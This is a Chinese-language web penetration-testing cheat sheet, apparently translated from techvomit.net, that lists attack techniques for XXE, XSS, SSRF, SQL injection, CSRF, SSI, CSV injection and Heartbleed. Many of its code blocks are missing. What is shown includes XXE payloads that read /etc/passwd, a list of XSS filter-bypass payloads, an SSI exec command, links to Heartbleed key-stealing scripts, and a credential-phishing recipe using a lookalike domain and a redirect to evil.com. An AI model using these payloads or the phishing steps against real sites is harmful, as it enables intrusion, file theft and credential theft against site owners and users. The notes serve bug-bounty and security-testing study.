Web-Fast-Fuzz

XXE

测试方法

发现post请求的接口的时候,可以这样试试:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">
]>
<methodCall><methodName>&test;</methodName></methodCall>

如果发现了一个错误:

<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test "nice string bro">]
>

<methodCall><methodName>&test;</methodName></methodCall>

说明能够解析,试试读文件:

<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test SYSTEM "file:///etc/passwd">]
>

<methodCall><methodName>&test;</methodName></methodCall>

或者用php伪协议:

得到的结果再base64解码即可。

webgoat8

测试方法

试一试是否可以添加实体的评论:

可以的话,试试file:

MUTILLIDAE

要获取mutillidae上的文件,要在form表单提交的过程中使用测试的payload:

或者把xml版本忽略掉:

以及上面提到的php流:

OUT OF BAND

基础测试

  1. 使用 burp 的collaborator 然后单击copy the payload to clipboard

  2. 将下面的code放入xml文件,然后上传:

看看是否发送了请求

成功后,再利用其他payload

读文件

wing.xml

vps->evil.dtd

host in dtd:

使用FTP读文件

evil.xml

将dtd文件放在VPS上:

ruby利用脚本:

fuzz

XSS

对于asp的站点,我们用unicode编码尖括号,适用于存储型XSS:

文件上传的XSS

发现上传点的时候,可以试试用payload作为文件名:

or:

or:

SVG

stuff.svg

XML

CSP BYPASS

常用的payload

  • svg/onload

  • '-alert(1)-'

  • eval(atob('YWxlcnQoMSk='))

  • <iMg SrC=x OnErRoR=alert(1)>

  • <div onmouseover="alert('XSS');">

    </Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>

  • x@x.com<--`<img/src=` onerror=alert(1)> --!>

  • ""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()

  • oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e

AUTH CRED

遇到http-only的时候: 使用钓鱼的基本身份验证获取其凭据

1. 注册一个和目标类似的域名

2. https://github.com/ryhanson/phisheryarrow-up-right

3. 编译然后运行

4. 设置payload----<img/src/onerror=document.location="https://evil.com/">

5. 等待目标上线

可还行

Blacklist bypass: 过滤了//,:,",<和>

payload:

另外一个:

比较不错的一个payload:

nc 监听:

测试session劫持

利用burp重放功能进行测试。 看不同cookie会有什么变化。

FILTER BYPASS RESOURCES

收集到的payload:

基于POST的XSS

如果遇到无法将基于POST的XSS转换为GET请求的情况(可能目标服务器上禁用了GET请求),试试CSRF。

DOM XSS

beef的hook,urlencode

这些站点有大量的xss payload

payload生成:

SSRF

在可以控制url参数的情况下,只要不重定向,就可以测试一下SSRF。 Webhooks, PDF 生成, 文档解析, 文件上传这些地方都可以重点关注一下。

PS:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRFarrow-up-right

想办法探测内网资产:http://internal-server:22/notarealfile.txtarrow-up-right 更换端口,查看回显,判断端口的开放。 没有回显的情况下,按照响应时间判断,以及DNSLOG,这玩意burp自带的也好用的。 根据我的经验,一些组件只能使用某些端口,例如80,8080,443等。最好对这些端口进行测试。

如果你的payload中有路径,最好带上&,#

这篇文章对SOP和CORS以及SSRF都有很好的讲解:https//www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/

Bug Bounty Write-ups:

SQL注入

使用SQLMap在PUT REST Params中测试SQLi:

备忘录:https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/arrow-up-right

可以试试双编码输入。

会话固定

快速检查的方法,可用于确定会话固定漏洞是否是网站上的问题:

CSRF

一些绕过技术,即使有CSRF Token: https://zseano.com/tutorials/5.htmlarrow-up-right

csrf和reset api:

案例:

CSRF TO REDECT XSS

文件上传漏洞

在OS X上创建测试10g文件(对于测试文件上载限制很有用):

无限制的文件上传

资源:

一些备忘录:https://github.com/jhaddix/tbhmarrow-up-right

CORS配置错误

用于测试的POC:

资源:

测试心脏出血漏洞

偷私钥

https://gist.github.com/bonsaiviking/10402038arrow-up-right https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.pyarrow-up-right

重定向

http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.htmlarrow-up-right

重定向到beef:

使用Burp中的Decoder将其编码为base-64,并将其传递给payload:

other:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open redirectarrow-up-right

CRLF注入

当你看到请求的参数是这样:

回显是这样:

尝试CRLF注射:

模板注入

您可以将一些代码放入jsfiddle以进行payload测试:

http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.htmlarrow-up-right

RCE

使用WEBSHEL​​L上传(.NET)绕过AV: 这是一个示例,其中包含fuzzdb项目中的一个webshel​​l:

https://hax365.wordpress.com/2015/12/15/easy-trick-to-upload-a-web-shell-and-bypass-av-products/arrow-up-right

PHP中的匿名函数RCE

PHP实验

如果您需要测试一些PHP代码,可以使用本机Web服务器来托管它:

PHP交互式SHELL

CSV注入

在Windows上的Excel中,输入以下内容以获取cmd shell:

exmaple:https://rhinosecuritylabs.com/azure/cloud-security-risks-part-1-azure-csv-injection-vulnerability/arrow-up-right

movie:https://www.youtube.com/watch?v=SC7AkclnG2garrow-up-right

有用的脚本

不断检查网站服务是否关闭:

IDORS

https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/arrow-up-right

服务器端包含注入

把它放在一个易受攻击的参数中: 如果有效,您应该在响应中看到当前日期和时间输出。

<!--#printenv -->:输出环境变量。

<!--#exec cmd="cat /etc/passwd"-->

more:

点击劫持

只需使用Burp的clickbandit。还要记住:Clickjacking适用于点击,而不适用于键盘。

poc:

https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009arrow-up-right) https://javascript.info/clickjackingarrow-up-right https://www.tinfoilsecurity.com/blog/what-is-clickjackingarrow-up-right

攻击JSON

利用burp标记参数进行主动扫描

https://www.coalfire.com/Solutions/Coalfire-Labs/The-Coalfire-LABS-Blog/may-2018/the-right-way-to-test-json-parameters-with-burparrow-up-right

反序列化漏洞

Writeup on Oracle Weblogic CVE-2018-2628arrow-up-right Java Deserialization Scanner Burp Extensionarrow-up-right Java Serialized Payloads Burp Extensionarrow-up-right

工具

Ysoserialarrow-up-right

测试不安全的JWT

LFI

https://hack-ed.net/2017/11/05/finally-a-bug-bounty-write-up-lfi/arrow-up-right

子域名探测技术

https://0xpatrik.com/subdomain-takeover-starbucks/arrow-up-right

原文地址:https://techvomit.net/web-application-penetration-testing-notes/arrow-up-right

最后更新于

这有帮助吗?